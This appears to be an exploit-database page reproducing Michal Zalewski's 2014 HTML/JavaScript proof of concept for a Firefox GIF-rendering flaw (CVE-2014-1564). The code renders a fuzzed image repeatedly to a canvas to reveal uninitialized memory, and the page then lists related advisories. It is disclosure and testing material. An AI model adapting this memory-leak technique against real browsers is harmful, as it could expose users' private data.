Lucene search
Michal ZalewskiPACKETSTORM:128132HistorySep 03, 2014 - 12:00 a.m.
Mozilla Firefox Secret Leak
2014-09-0300:00:00
Michal Zalewski
packetstormsecurity.com
24
0.019 Low
EPSS
Percentile
87.3%
`<style>
body {
background-color: #d0d0d0;
}
img {
border: 1px solid teal;
margin: 1ex;
}
canvas {
border: 1px solid crimson;
margin: 1ex;
}
</style>
<body onload="set_images()">
<div id="status">
</div>
<div id="image_div">
</div>
<canvas height=32 width=32 id=cvs>
</canvas>
<h2>Variants:</h2>
<ul id="output">
</ul>
<script>
var c = document.getElementById('cvs');
var ctx = c.getContext('2d');
var loaded = 0;
var image_obj = [];
var USE_IMAGES = 300;
function check_results() {
var uniques = [];
uniques.push(image_obj[0].imgdata);
document.getElementById('output').innerHTML +=
'<img src="' + image_obj[0].imgdata + '">';
for (var i = 1; i < USE_IMAGES; i++) {
if (image_obj[0].imgdata != image_obj[i].imgdata) {
for (var j = 1; j < uniques.length; j++)
if (uniques[j] == image_obj[i].imgdata) break;
if (j == uniques.length) {
uniques.push(image_obj[i].imgdata);
document.getElementById('output').innerHTML +=
'<img src="' + image_obj[i].imgdata + '">';
}
}
}
if (uniques.length > 1)
alert('The image has ' + uniques.length + ' variants when rendered. Looks like you have a problem.');
else
alert('The image has just one variant when rendered. You\'re probably OK.');
}
function count_image() {
loaded++;
ctx.clearRect(0, 0, 32, 32);
try {
ctx.drawImage(this, 0, 0, 32, 32);
} catch (e) { }
this.imgdata = c.toDataURL();
if (loaded == USE_IMAGES) check_results();
}
function set_images() {
loaded = 0;
create_images();
for (var i = 0; i < USE_IMAGES; i++)
image_obj[i].src = './id:000110,src:000023.gif?' + Math.random();
}
function create_images() {
for (var i = 0; i < USE_IMAGES; i++) {
image_obj[i] = new Image();
image_obj[i].height = 32;
image_obj[i].width = 32;
image_obj[i].onerror = count_image;
image_obj[i].onload = count_image;
document.getElementById('image_div').appendChild(image_obj[i]);
}
}
</script>
<iframe src='http://www.cnn.com/'></iframe>
`
Related
prion
prion
Information disclosure
2014-09-03 10:55:00
securityvulns
securityvulns
Uninit memory disclosure via truncated images in Firefox
2014-09-15 00:00:00
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
2014-09-15 00:00:00
openvas
openvas
Mozilla Firefox Security Advisory (MFSA2014-69) - Linux
2021-11-11 00:00:00
Mozilla Thunderbird Multiple Vulnerabilities-02 (Sep 2014) - Windows
2014-09-05 00:00:00
Mozilla Firefox ESR Multiple Vulnerabilities-02 (Sep 2014) - Windows
2014-09-05 00:00:00
mozilla
mozilla
Uninitialized memory use during GIF rendering — Mozilla
2014-09-02 00:00:00
ubuntucve
ubuntucve
CVE-2014-1564
2014-09-02 00:00:00
cve
cve
CVE-2014-1564
2014-09-03 10:55:00
fireeye
fireeye
Fuzzing Image Parsing in Windows, Part Two: Uninitialized Memory
2021-03-03 00:00:00
suse
suse
MozillaThunderbird: Update to 31.1 release (important)
2014-09-09 12:07:15
Firefox update to latest 31ESR release (important)
2015-01-25 16:04:59
Mozilla (Firefox/Thunderbird) updates to 31.8.0 (important)
2015-07-18 19:07:56
nessus
nessus
Firefox ESR 31.x < 31.1 Multiple Vulnerabilities
2014-09-03 00:00:00
Ubuntu 14.04 LTS : Thunderbird vulnerabilities (USN-2330-1)
2014-09-12 00:00:00
Mozilla Thunderbird < 31.1 Multiple Vulnerabilities (Mac OS X)
2014-09-03 00:00:00
ubuntu
ubuntu
Thunderbird vulnerabilities
2014-09-11 00:00:00
Firefox vulnerabilities
2014-09-02 00:00:00
mageia
mageia
Updated iceape package fixes security vulnerabilities
2014-10-23 17:27:57
gentoo
gentoo
Mozilla Products: Multiple vulnerabilities
2015-04-07 00:00:00